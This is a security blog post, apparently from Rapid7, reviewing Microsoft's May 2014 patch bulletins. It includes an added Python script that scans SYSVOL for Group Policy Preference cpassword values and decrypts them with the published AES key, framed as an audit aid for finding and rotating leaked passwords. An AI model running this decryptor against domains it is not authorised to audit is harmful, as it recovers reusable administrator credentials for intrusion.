There is a lot going on in this month's updates from Microsoft, including some very interesting and long-awaited changes. It is also the highest volume of bulletins so far this year: eight, two of which are rated critical.
How to describe the patching priority is going to be subjective. Microsoft has flagged three of the bulletins as priority 1 for deployment: MS14-024, MS14-025 and the IE update, MS14-029. Interestingly, MS14-029 is the only one of the two critical bulletins to receive the priority 1 designation. The other critical, MS14-022, affecting SharePoint, is priority 2. That is down to the complexity of the attack and the fact that the issue was privately reported and is not known to be under public exploitation.
MS14-029 is an interesting bulletin. It is not a cumulative rollup for IE, which breaks with the recent trend in IE patching, but it does re-include the fix shipped as MS14-021 outside the normal patch cycle on May 1st. It is not yet clear whether this modifies the original fix or simply provides another channel for customers to get it. One of the other CVEs fixed in this bulletin is under limited, targeted attack. There are also two flavours of this patch for Windows 8.1 users: one for those who installed the Windows 8.1 Update released in April (the “Spring 2014 update rollup”) and one for those who did not. Not to mention that this is the first bulletin that clearly would have applied to Windows XP, but for which no patch is available. IE 6, 7 and 8 are listed as vulnerable on Windows Server 2003 SP2, which historically would have mapped to the same set of XP patches, but not this time. Anyone still running XP just got a little less secure, not that they were well off to begin with.
Of the other two priority 1 bulletins, both rated only important, MS14-024 fixes an ASLR bypass in a Microsoft common control library. On its own the issue does not give an attacker code execution, hence the “important” rating; it is a weakness that is chained with a memory-corruption exploit to learn where code and data sit in memory, which turns a crash into a reliable exploit. MS14-024 has been observed in use alongside other attacks.
MS14-025 isn't really a fix for the underlying issue; it is a guard rail that stops administrators from weakening their security going forward by removing the ability to set a local account password through Group Policy Preferences. Passwords set that way are written into the policy's XML files in SYSVOL, which every authenticated user on the domain can read, and they are “encrypted” with a fixed AES key that Microsoft itself published in the MS-GPPREF specification, so anyone on the network can recover them in reusable, cleartext form. Administrators who have already made that mistake will not have the setting removed by this update: the existing preference items stay in SYSVOL until they are deleted by hand and the affected passwords changed, and the accompanying knowledge base article includes scripts to help find them.
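To show what “recoverable by anyone on the network” means in practice, here is an added example (not Rapid7's or Microsoft's code) that walks a SYSVOL-style directory tree, reports every Group Policy Preference item that still carries a `cpassword` attribute, and decrypts it when an AES library (pycryptodome or cryptography) is importable. The domain name, GPO GUID, account name and `Groups.xml` contents are constructed for the demo; the AES key is the one Microsoft published in MS-GPPREF. The same walk applies to the other preference files that can carry a password (services, scheduled tasks, data sources, drive maps, printers), which differ only in the attribute that names the account.

```python
"""Find and decrypt leftover Group Policy Preference cpassword values.

Added example, not code from the original post.  SYSVOL paths, the GPO
GUID and the sample Groups.xml below are constructed for the demo.
"""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Fixed key published in MS-GPPREF 2.2.1.1.4; every domain used the same one.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# GPP files that may carry a cpassword, mapped to the attribute naming the account.
CPASSWORD_FILES = {
    "Groups.xml": "userName",
    "Services.xml": "accountName",
    "ScheduledTasks.xml": "runAs",
    "DataSources.xml": "username",
    "Drives.xml": "userName",
    "Printers.xml": "userName",
}


def cpassword_bytes(cpassword: str) -> bytes:
    """cpassword is base64 with the '=' padding stripped; restore it and decode."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def _aes_cbc_decrypt(key: bytes, data: bytes):
    """AES-256-CBC, zero IV (as GPP does). Returns None when no AES library is installed."""
    iv = bytes(16)
    try:
        from Crypto.Cipher import AES  # pycryptodome
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        pass
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        return None


def decrypt_cpassword(cpassword: str):
    """Return the cleartext password (UTF-16LE, PKCS#7 padded) or None if AES is unavailable."""
    plain = _aes_cbc_decrypt(GPP_AES_KEY, cpassword_bytes(cpassword))
    if plain is None:
        return None
    return plain[: -plain[-1]].decode("utf-16-le")  # strip PKCS#7 padding


def find_cpasswords(sysvol_root: str):
    """Walk SYSVOL and collect every element carrying a non-empty cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in CPASSWORD_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # a damaged preference file is still worth a manual look
            for elem in root.iter():
                cpw = elem.get("cpassword")
                if cpw:
                    findings.append({
                        "file": path,
                        "account": elem.get(CPASSWORD_FILES[name]),
                        "cpassword": cpw,
                        "password": decrypt_cpassword(cpw),
                    })
    return findings


# Constructed sample in the shape the "Local Users and Groups" preference editor writes.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        image="2" changed="2014-05-01 12:00:00" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="Administrator (built-in)"/>
  </User>
</Groups>
"""


def build_sample_sysvol() -> str:
    """Create a throwaway SYSVOL-like tree with one (made-up) GPO carrying the sample file."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(root, "corp.example", "Policies",
                       "{A1B2C3D4-0000-4000-8000-000000000001}",
                       "Machine", "Preferences", "Groups")
    os.makedirs(gpo)
    with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        pw = hit["password"] if hit["password"] is not None else "(no AES library; not decrypted)"
        print(f"{hit['file']}\n  account={hit['account']!r}  password={pw}")
```

Against a real domain, point `find_cpasswords` at `\\<domain>\SYSVOL\<domain>\Policies` (mounted or copied locally) and treat every hit as a password that must be rotated, not merely deleted from the GPO: the value may already have been harvested, and the local accounts it was pushed to still have it.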
MS14-027 is an elevation of privilege issue in the Windows shell file-association handler that was privately reported to Microsoft but, again, has been detected in limited, targeted attacks in the wild.
MS14-028 is a denial of service affecting Windows Server systems running the iSCSI target service. The target is not installed by default on Windows Server 2008 or 2008 R2, and is installed but not enabled by default on Windows Server 2012. The interesting note here is that there is no fix available for Windows Server 2008, even though it is vulnerable. 2008 R2 and 2012 are being patched, but apparently fixing the issue on 2008 would severely affect compatibility with iSCSI devices, so it is time to update the OS version on your file server, folks.
On top of the numbered bulletins, Microsoft is rolling out an update for the bundled Flash Player on Windows 8 and later, a functionality change to UEFI affecting Secure Boot and offline backups, and, most interestingly, is backporting the “credentials protection” functionality recently released for Windows 8.1 to Windows 7 and 8 (and their server equivalents) as KB2871997. That last change is meant to make credential replay much harder to accomplish, but it is not a complete fix for “pass the hash” style attacks.
Author: Ross Barrett, Senior Manager, Security Engineering, Rapid7.